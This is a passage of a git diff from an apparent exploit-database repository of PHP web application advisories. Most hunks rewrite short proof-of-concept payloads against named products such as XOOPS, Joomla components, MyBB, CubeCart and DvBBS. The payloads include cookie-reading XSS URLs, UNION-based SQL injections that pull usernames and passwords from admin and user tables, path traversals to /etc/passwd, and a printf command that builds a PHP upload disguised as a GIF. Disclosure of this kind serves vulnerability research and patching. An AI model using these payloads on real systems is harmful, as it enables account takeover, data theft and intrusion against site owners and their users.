http://www.example.com/sitebuilder/index.php/"><script>alert(document.cookie);</script> -http://www.example.com/sitebuilder/index.php?sitebuilder_id="><script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/sitebuilder/index.php?sitebuilder_id="><script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/33130.txt b/platforms/php/webapps/33130.txt old mode 100755 new mode 100644 index 29d77febc..106bc16b7 --- a/platforms/php/webapps/33130.txt +++ b/platforms/php/webapps/33130.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br The following example URI is available: -http://www.example.com/community/index.php?pageurl=board&mode=view&b_no=Evil-code5014&bt_code=Evil-code&page=Evil-code \ No newline at end of file +http://www.example.com/community/index.php?pageurl=board&mode=view&b_no=Evil-code5014&bt_code=Evil-code&page=Evil-code \ No newline at end of file diff --git a/platforms/php/webapps/33131.txt b/platforms/php/webapps/33131.txt old mode 100755 new mode 100644 index 8afe77ce7..c3278c477 --- a/platforms/php/webapps/33131.txt +++ b/platforms/php/webapps/33131.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br XOOPS 2.3.3 is vulnerable; other versions may be affected as well. http://www.example.com/xoops-2.3.3/htdocs/modules/pm/viewpmsg.php?op='"><script>alert('vulnerable')</script> -http://www.example.com/xoops-2.3.3/htdocs/modules/profile/user.php?"><script>alert('vulnerable')</script> \ No newline at end of file +http://www.example.com/xoops-2.3.3/htdocs/modules/profile/user.php?"><script>alert('vulnerable')</script> \ No newline at end of file diff --git a/platforms/php/webapps/33132.txt b/platforms/php/webapps/33132.txt old mode 100755 new mode 100644 index f84cfe2c8..0b1322931 --- a/platforms/php/webapps/33132.txt +++ b/platforms/php/webapps/33132.txt @@ -4,4 +4,4 @@ Softbiz Dating Script is prone to an SQL-injection vulnerability because it fail Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/cat_products.php?cid=[SQL INJ] \ No newline at end of file +http://www.example.com/cat_products.php?cid=[SQL INJ] \ No newline at end of file diff --git a/platforms/php/webapps/3314.txt b/platforms/php/webapps/3314.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33144.txt b/platforms/php/webapps/33144.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33146.txt b/platforms/php/webapps/33146.txt old mode 100755 new mode 100644 index e315bea50..ee572e701 --- a/platforms/php/webapps/33146.txt +++ b/platforms/php/webapps/33146.txt @@ -8,4 +8,4 @@ Versions prior to CS-Cart 2.0.6 are vulnerable. The following example URI is available: -http://www.example.com/index.php?dispatch=reward_points.userlog&result_ids=pagination_contents&sort_by=timestamp&sort_order=' \ No newline at end of file +http://www.example.com/index.php?dispatch=reward_points.userlog&result_ids=pagination_contents&sort_by=timestamp&sort_order=' \ No newline at end of file diff --git a/platforms/php/webapps/33147.txt b/platforms/php/webapps/33147.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33149.txt b/platforms/php/webapps/33149.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3315.txt b/platforms/php/webapps/3315.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33152.txt b/platforms/php/webapps/33152.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33153.txt b/platforms/php/webapps/33153.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33154.txt b/platforms/php/webapps/33154.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33155.txt b/platforms/php/webapps/33155.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33156.txt b/platforms/php/webapps/33156.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33157.txt b/platforms/php/webapps/33157.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33158.txt b/platforms/php/webapps/33158.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33160.txt b/platforms/php/webapps/33160.txt old mode 100755 new mode 100644 index 0a503836c..0b7a84772 --- a/platforms/php/webapps/33160.txt +++ b/platforms/php/webapps/33160.txt @@ -7,4 +7,4 @@ An attacker can exploit this vulnerability to upload arbitrary code and execute The following command will generate a file with a valid GIF header that runs the 'phpinfo()' function when requested: -$ printf "GIF89a\x01\x00\x01\x00<?php phpinfo();?>" > poc.php \ No newline at end of file +$ printf "GIF89a\x01\x00\x01\x00<?php phpinfo();?>" > poc.php \ No newline at end of file diff --git a/platforms/php/webapps/33166.txt b/platforms/php/webapps/33166.txt old mode 100755 new mode 100644 index 1a658e75a..dc38a4e4f --- a/platforms/php/webapps/33166.txt +++ b/platforms/php/webapps/33166.txt @@ -8,4 +8,4 @@ Discuz! 6.0 is affected; other versions may also be vulnerable. The following example URI is available: -http://www.example.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members \ No newline at end of file +http://www.example.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members \ No newline at end of file diff --git a/platforms/php/webapps/33178.txt b/platforms/php/webapps/33178.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33186.txt b/platforms/php/webapps/33186.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33187.txt b/platforms/php/webapps/33187.txt old mode 100755 new mode 100644 index f4a65d058..c9058b5bf --- a/platforms/php/webapps/33187.txt +++ b/platforms/php/webapps/33187.txt @@ -4,4 +4,4 @@ VideoGirls is prone to multiple cross site scripting vulnerabilities because the Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible. -http://www.example.com/profile.php?profile_name="><script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/profile.php?profile_name="><script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/33188.txt b/platforms/php/webapps/33188.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33189.txt b/platforms/php/webapps/33189.txt old mode 100755 new mode 100644 index fa3c24a49..3a050424d --- a/platforms/php/webapps/33189.txt +++ b/platforms/php/webapps/33189.txt @@ -7,4 +7,4 @@ Attackers can exploit these issues to harvest sensitive information that may lea The following example URIs are available: http://www.example.com/members.php?sortby[]=A -http://www.example.com/messages.php?folder[]=inbox \ No newline at end of file +http://www.example.com/messages.php?folder[]=inbox \ No newline at end of file diff --git a/platforms/php/webapps/33190.txt b/platforms/php/webapps/33190.txt old mode 100755 new mode 100644 index 512ec5a84..9442dca49 --- a/platforms/php/webapps/33190.txt +++ b/platforms/php/webapps/33190.txt @@ -10,4 +10,4 @@ The following proof-of-concept URIs are available: http://www.example.com/openauto/xml_zone_data.php?filter=1%20union%20select%20concat(0x0a,user,0x3a,pass,0x3a,0x0a)%20from%20users -http://www.example.com/openauto/listings.php?min-price=&max_price=&start_zip=BENCHMARK(1000000,MD5(1))&zip_range=10000&state=Illinois&submit=Search&vehicle_type=&make=&model=&year=&listing_condition=&trans=&drive_train=&sellerid= \ No newline at end of file +http://www.example.com/openauto/listings.php?min-price=&max_price=&start_zip=BENCHMARK(1000000,MD5(1))&zip_range=10000&state=Illinois&submit=Search&vehicle_type=&make=&model=&year=&listing_condition=&trans=&drive_train=&sellerid= \ No newline at end of file diff --git a/platforms/php/webapps/33191.txt b/platforms/php/webapps/33191.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33195.txt b/platforms/php/webapps/33195.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33197.txt b/platforms/php/webapps/33197.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33198.txt b/platforms/php/webapps/33198.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33199.txt b/platforms/php/webapps/33199.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33200.txt b/platforms/php/webapps/33200.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33201.txt b/platforms/php/webapps/33201.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33202.txt b/platforms/php/webapps/33202.txt old mode 100755 new mode 100644 index 8af7e58be..95446f1f8 --- a/platforms/php/webapps/33202.txt +++ b/platforms/php/webapps/33202.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br These issues affect 68 Classifieds 4.1; other versions may also be affected. - http://www.example.com/viewmember.php?member=[code] \ No newline at end of file + http://www.example.com/viewmember.php?member=[code] \ No newline at end of file diff --git a/platforms/php/webapps/33204.txt b/platforms/php/webapps/33204.txt old mode 100755 new mode 100644 index 3a577fd7f..53e8e773a --- a/platforms/php/webapps/33204.txt +++ b/platforms/php/webapps/33204.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th phpAuction 3.2 is vulnerable; other versions may also be affected. -http://www.example.com/auction/index.php?lan=Evilshell \ No newline at end of file +http://www.example.com/auction/index.php?lan=Evilshell \ No newline at end of file diff --git a/platforms/php/webapps/33206.txt b/platforms/php/webapps/33206.txt old mode 100755 new mode 100644 index e3a37ffb5..e579d513e --- a/platforms/php/webapps/33206.txt +++ b/platforms/php/webapps/33206.txt @@ -25,4 +25,4 @@ http://www.example.com/speed/?blocks=%3Cscript%3Ealert(1)%3C/script%3E http://www.example.com/index.php?ind=horoscop&blocks=%3Cscript%3Ealert(1)%3C/script%3E http://www.example.com/index.php?ind=horoscop&output=%3Cscript%3Ealert(1)%3C/script%3E http://www.example.com/catphones/index.php?output=%3Cscript%3Ealert(1)%3C/script%3E -http://www.example.com/catphones/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E \ No newline at end of file +http://www.example.com/catphones/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/33208.txt b/platforms/php/webapps/33208.txt old mode 100755 new mode 100644 index 0f43e8944..ca4a102cd --- a/platforms/php/webapps/33208.txt +++ b/platforms/php/webapps/33208.txt @@ -7,4 +7,4 @@ Attacker-supplied HTML or JavaScript code could run in the context of the affect The following example data is available: [UttpRL=htttptp://example.com]example.com[/URL] -[IMttpG]htttptps://example.com/image.php?i=1&dateline=[/IMG] \ No newline at end of file +[IMttpG]htttptps://example.com/image.php?i=1&dateline=[/IMG] \ No newline at end of file diff --git a/platforms/php/webapps/33214.txt b/platforms/php/webapps/33214.txt old mode 100755 new mode 100644 index 2e2984801..96c7ece7b --- a/platforms/php/webapps/33214.txt +++ b/platforms/php/webapps/33214.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc DvBBS 2.0 is vulnerable; other versions may also be affected. -http://www.example.com/[Path]/boardrule.php?groupboardid=1/**/union/**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/ \ No newline at end of file +http://www.example.com/[Path]/boardrule.php?groupboardid=1/**/union/**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/ \ No newline at end of file diff --git a/platforms/php/webapps/33217.txt b/platforms/php/webapps/33217.txt old mode 100755 new mode 100644 index 8bc93f528..fcd18f637 --- a/platforms/php/webapps/33217.txt +++ b/platforms/php/webapps/33217.txt @@ -4,4 +4,4 @@ The 'com_pressrelease' component for Joomla! is prone to an SQL-injection vulner Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_pressrelease&id=null+union+select+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- \ No newline at end of file +http://www.example.com/index.php?option=com_pressrelease&id=null+union+select+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- \ No newline at end of file diff --git a/platforms/php/webapps/33218.txt b/platforms/php/webapps/33218.txt old mode 100755 new mode 100644 index 809e59d85..c756301bc --- a/platforms/php/webapps/33218.txt +++ b/platforms/php/webapps/33218.txt @@ -5,4 +5,4 @@ The 'com_mediaalert' component for Joomla! is prone to an SQL-injection vulnerab Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_mediaalert&id=null+union+select+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- \ No newline at end of file +http://www.example.com/index.php?option=com_mediaalert&id=null+union+select+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- \ No newline at end of file diff --git a/platforms/php/webapps/33219.txt b/platforms/php/webapps/33219.txt old mode 100755 new mode 100644 index ea0fe0437..39cc82a4d --- a/platforms/php/webapps/33219.txt +++ b/platforms/php/webapps/33219.txt @@ -8,4 +8,4 @@ Planet 2.0 is affected; other versions may also be vulnerable. The following example code is available: -<img src="javascript:alert(1);" > \ No newline at end of file +<img src="javascript:alert(1);" > \ No newline at end of file diff --git a/platforms/php/webapps/3322.htm b/platforms/php/webapps/3322.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33226.txt b/platforms/php/webapps/33226.txt old mode 100755 new mode 100644 index 7b390ea51..0749e0866 --- a/platforms/php/webapps/33226.txt +++ b/platforms/php/webapps/33226.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Mega File Hosting Script 1.2 is vulnerable; other versions may also be affected. -http://www.example.com/emaillinks.php?moudi=1"><script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/emaillinks.php?moudi=1"><script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/33227.txt b/platforms/php/webapps/33227.txt old mode 100755 new mode 100644 index 5f7302bd2..17de4658f --- a/platforms/php/webapps/33227.txt +++ b/platforms/php/webapps/33227.txt @@ -4,4 +4,4 @@ Morris Guestbook is prone to a cross-site scripting vulnerability because it fai An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/view.php?pagina=1"><script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/view.php?pagina=1"><script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/3323.htm b/platforms/php/webapps/3323.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33232.txt b/platforms/php/webapps/33232.txt old mode 100755 new mode 100644 index d84d91050..01f3f9978 --- a/platforms/php/webapps/33232.txt +++ b/platforms/php/webapps/33232.txt @@ -9,4 +9,4 @@ MyBB 1.4.8 is vulnerable; other versions may also be affected. The following examples are available: simple query: ' or 1=1-- -blind query: ' having 1=1-- \ No newline at end of file +blind query: ' having 1=1-- \ No newline at end of file diff --git a/platforms/php/webapps/33237.txt b/platforms/php/webapps/33237.txt old mode 100755 new mode 100644 index cbc11b97b..6da6c912f --- a/platforms/php/webapps/33237.txt +++ b/platforms/php/webapps/33237.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc SportFusion 0.2.2 and 0.2.3 are affected; other versions may also be vulnerable. -http://www.example.com/index.php?option=com_sportfusion&view=teamdetail&cid[0]=-666+union+select+1,2,3,4,5,concat(0x3a,username,password)kaMtiez,7,8,9,10,11,12,13+from+jos_users-- \ No newline at end of file +http://www.example.com/index.php?option=com_sportfusion&view=teamdetail&cid[0]=-666+union+select+1,2,3,4,5,concat(0x3a,username,password)kaMtiez,7,8,9,10,11,12,13+from+jos_users-- \ No newline at end of file diff --git a/platforms/php/webapps/33238.txt b/platforms/php/webapps/33238.txt old mode 100755 new mode 100644 index 775b2c2be..7cdb55f54 --- a/platforms/php/webapps/33238.txt +++ b/platforms/php/webapps/33238.txt @@ -4,4 +4,4 @@ The JoomlaFacebook component ('com_facebook') for Joomla! is prone to an SQL-inj Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_facebook&view=student&id=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12+from+jos_users-- \ No newline at end of file +http://www.example.com/index.php?option=com_facebook&view=student&id=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12+from+jos_users-- \ No newline at end of file diff --git a/platforms/php/webapps/33239.txt b/platforms/php/webapps/33239.txt old mode 100755 new mode 100644 index 6d379c749..c19558da0 --- a/platforms/php/webapps/33239.txt +++ b/platforms/php/webapps/33239.txt @@ -8,4 +8,4 @@ The following URIs are available: http://www.example.com/cosmetics_zone/view_products.php?cat_id=5&sub_id=4+and+1=1-- True -http://www.example.com/cosmetics_zone/view_products.php?cat_id=5&sub_id=4+and+1=2-- False \ No newline at end of file +http://www.example.com/cosmetics_zone/view_products.php?cat_id=5&sub_id=4+and+1=2-- False \ No newline at end of file diff --git a/platforms/php/webapps/3324.txt b/platforms/php/webapps/3324.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33240.txt b/platforms/php/webapps/33240.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33241.txt b/platforms/php/webapps/33241.txt old mode 100755 new mode 100644 index 44a858829..fdd6ace5d --- a/platforms/php/webapps/33241.txt +++ b/platforms/php/webapps/33241.txt @@ -4,4 +4,4 @@ DVD Zone is prone to an SQL-injection vulnerability and a cross-site scripting v Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/view_mag.php?mag_id=<script>alert(123)</script> \ No newline at end of file +http://www.example.com/view_mag.php?mag_id=<script>alert(123)</script> \ No newline at end of file diff --git a/platforms/php/webapps/33242.txt b/platforms/php/webapps/33242.txt old mode 100755 new mode 100644 index a4b62e879..54957dc45 --- a/platforms/php/webapps/33242.txt +++ b/platforms/php/webapps/33242.txt @@ -5,4 +5,4 @@ Agent Zone is prone to an SQL-injection vulnerability because it fails to suffic Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/real/view_listing.php?id=4+and+substring(@@version,1,1)=5 True -http://www.example.com/real/view_listing.php?id=4+and+substring(@@version,1,1)=4 False \ No newline at end of file +http://www.example.com/real/view_listing.php?id=4+and+substring(@@version,1,1)=4 False \ No newline at end of file diff --git a/platforms/php/webapps/33249.txt b/platforms/php/webapps/33249.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33250.txt b/platforms/php/webapps/33250.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33252.txt b/platforms/php/webapps/33252.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33256.txt b/platforms/php/webapps/33256.txt old mode 100755 new mode 100644 index 8d0e7ed79..60a5016e6 --- a/platforms/php/webapps/33256.txt +++ b/platforms/php/webapps/33256.txt @@ -6,4 +6,4 @@ Successfully exploiting the security-bypass issue will allow an attacker to bypa The attacker could exploit the cross-site scripting issues to execute arbitrary script code in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/search.php?in=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/search.php?ex=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/search.php?ep=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/search.php?be=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/search.php?in=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/search.php?ex=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/search.php?ep=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/search.php?be=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/3326.txt b/platforms/php/webapps/3326.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33262.txt b/platforms/php/webapps/33262.txt old mode 100755 new mode 100644 index 33e9c3a48..3dbed8566 --- a/platforms/php/webapps/33262.txt +++ b/platforms/php/webapps/33262.txt @@ -8,4 +8,4 @@ Knowledge Manager 5 is vulnerable; other versions may also be affected. The following example URI is available: -http://www.example.com/admin/de/dialog/file_manager.php?w=&p=/../../../../../../../../../../../../../etc/hosts \ No newline at end of file +http://www.example.com/admin/de/dialog/file_manager.php?w=&p=/../../../../../../../../../../../../../etc/hosts \ No newline at end of file diff --git a/platforms/php/webapps/33266.txt b/platforms/php/webapps/33266.txt old mode 100755 new mode 100644 index 4c4336047..3e59f4880 --- a/platforms/php/webapps/33266.txt +++ b/platforms/php/webapps/33266.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc The following example URI is available: -http://www.example.com/index.php?option=com_cbresumebuilder&task=group_members&group_id=-666+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users-- \ No newline at end of file +http://www.example.com/index.php?option=com_cbresumebuilder&task=group_members&group_id=-666+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users-- \ No newline at end of file diff --git a/platforms/php/webapps/33267.txt b/platforms/php/webapps/33267.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3327.txt b/platforms/php/webapps/3327.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3328.htm b/platforms/php/webapps/3328.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33281.txt b/platforms/php/webapps/33281.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33282.txt b/platforms/php/webapps/33282.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33287.txt b/platforms/php/webapps/33287.txt old mode 100755 new mode 100644 index 90ec18457..3c44ad585 --- a/platforms/php/webapps/33287.txt +++ b/platforms/php/webapps/33287.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects bloofoxCMS 0.3.5; other versions may be vulnerable as well. -http://www.example.com/search.5.html?search=x%27%22%3E%3Cscript%3Ealert(%22redneck%22)%3C/script%3E \ No newline at end of file +http://www.example.com/search.5.html?search=x%27%22%3E%3Cscript%3Ealert(%22redneck%22)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/33288.txt b/platforms/php/webapps/33288.txt old mode 100755 new mode 100644 index 6521b9104..573e4ccc3 --- a/platforms/php/webapps/33288.txt +++ b/platforms/php/webapps/33288.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects Zainu 1.0; other versions may be vulnerable as well. -http://www.example.com/demo/index.php?view=SearchSong&searchSongKeyword=buurp%22%27%3E%3Cscript%3Ealert(%22BUUURP%21%21%22)%3C/script%3E \ No newline at end of file +http://www.example.com/demo/index.php?view=SearchSong&searchSongKeyword=buurp%22%27%3E%3Cscript%3Ealert(%22BUUURP%21%21%22)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/33290.txt b/platforms/php/webapps/33290.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33291.txt b/platforms/php/webapps/33291.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33294.txt b/platforms/php/webapps/33294.txt old mode 100755 new mode 100644 index df44fbd27..f678a0b7b --- a/platforms/php/webapps/33294.txt +++ b/platforms/php/webapps/33294.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects TBmnetCMS 1.0; other versions may be vulnerable as well. -http://www.example.com/tbmnet.php?content=redneck%22%27%3E%3Cscript%3Ealert(/redneck/)%3C/script%3E \ No newline at end of file +http://www.example.com/tbmnet.php?content=redneck%22%27%3E%3Cscript%3Ealert(/redneck/)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/33295.txt b/platforms/php/webapps/33295.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33296.txt b/platforms/php/webapps/33296.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33297.txt b/platforms/php/webapps/33297.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33298.txt b/platforms/php/webapps/33298.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33299.txt b/platforms/php/webapps/33299.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33300.txt b/platforms/php/webapps/33300.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33301.txt b/platforms/php/webapps/33301.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33302.txt b/platforms/php/webapps/33302.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33303.txt b/platforms/php/webapps/33303.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33304.txt b/platforms/php/webapps/33304.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33305.txt b/platforms/php/webapps/33305.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33307.php b/platforms/php/webapps/33307.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33308.txt b/platforms/php/webapps/33308.txt old mode 100755 new mode 100644 index 133515ad3..d5ba4ea82 --- a/platforms/php/webapps/33308.txt +++ b/platforms/php/webapps/33308.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor Sahana 0.6.2.2 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?stream=text&mod=/../../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/index.php?stream=text&mod=/../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/33309.txt b/platforms/php/webapps/33309.txt old mode 100755 new mode 100644 index 14e27f929..c38272cb0 --- a/platforms/php/webapps/33309.txt +++ b/platforms/php/webapps/33309.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects TFTgallery 0.13; other versions may be vulnerable as well. -http://www.example.com/tftgallery/index.php?page=1&album= <script>document.write(document.cookie)</script> \ No newline at end of file +http://www.example.com/tftgallery/index.php?page=1&album= <script>document.write(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/33317.txt b/platforms/php/webapps/33317.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33320.txt b/platforms/php/webapps/33320.txt old mode 100755 new mode 100644 index aa5911de1..820f0db50 --- a/platforms/php/webapps/33320.txt +++ b/platforms/php/webapps/33320.txt @@ -8,4 +8,4 @@ This issue affects TFTgallery 0.13; other versions may be vulnerable as well. The following example URI is available: -http://www.example.com/tftgallery/settings.php?sample='></link><script>alert('blake XSS test')</script>&name=cucumber%20cool \ No newline at end of file +http://www.example.com/tftgallery/settings.php?sample='></link><script>alert('blake XSS test')</script>&name=cucumber%20cool \ No newline at end of file diff --git a/platforms/php/webapps/3334.asp b/platforms/php/webapps/3334.asp old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33340.txt b/platforms/php/webapps/33340.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33341.txt b/platforms/php/webapps/33341.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33342.txt b/platforms/php/webapps/33342.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33343.txt b/platforms/php/webapps/33343.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33344.txt b/platforms/php/webapps/33344.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33345.txt b/platforms/php/webapps/33345.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33354.txt b/platforms/php/webapps/33354.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33355.txt b/platforms/php/webapps/33355.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33356.txt b/platforms/php/webapps/33356.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33357.txt b/platforms/php/webapps/33357.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33358.txt b/platforms/php/webapps/33358.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33359.txt b/platforms/php/webapps/33359.txt old mode 100755 new mode 100644 index 547f41792..289f2046e --- a/platforms/php/webapps/33359.txt +++ b/platforms/php/webapps/33359.txt @@ -6,4 +6,4 @@ Attacker-supplied HTML or JavaScript code could run in the context of the affect PHD Help Desk 1.43 is vulnerable; other versions may also be affected. -http://www.example.com/caso_insert.php/[code] \ No newline at end of file +http://www.example.com/caso_insert.php/[code] \ No newline at end of file diff --git a/platforms/php/webapps/3336.txt b/platforms/php/webapps/3336.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33362.txt b/platforms/php/webapps/33362.txt old mode 100755 new mode 100644 index a649234e5..f61c78061 --- a/platforms/php/webapps/33362.txt +++ b/platforms/php/webapps/33362.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc The issue affects CubeCart 4.3.6; prior versions may also be affected. -http://www.example.com/store/index.php?_a=viewProd&productId=22+and+1=2+union+select+version() \ No newline at end of file +http://www.example.com/store/index.php?_a=viewProd&productId=22+and+1=2+union+select+version() \ No newline at end of file diff --git a/platforms/php/webapps/33365.txt b/platforms/php/webapps/33365.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33366.txt b/platforms/php/webapps/33366.txt old mode 100755 new mode 100644 diff --git 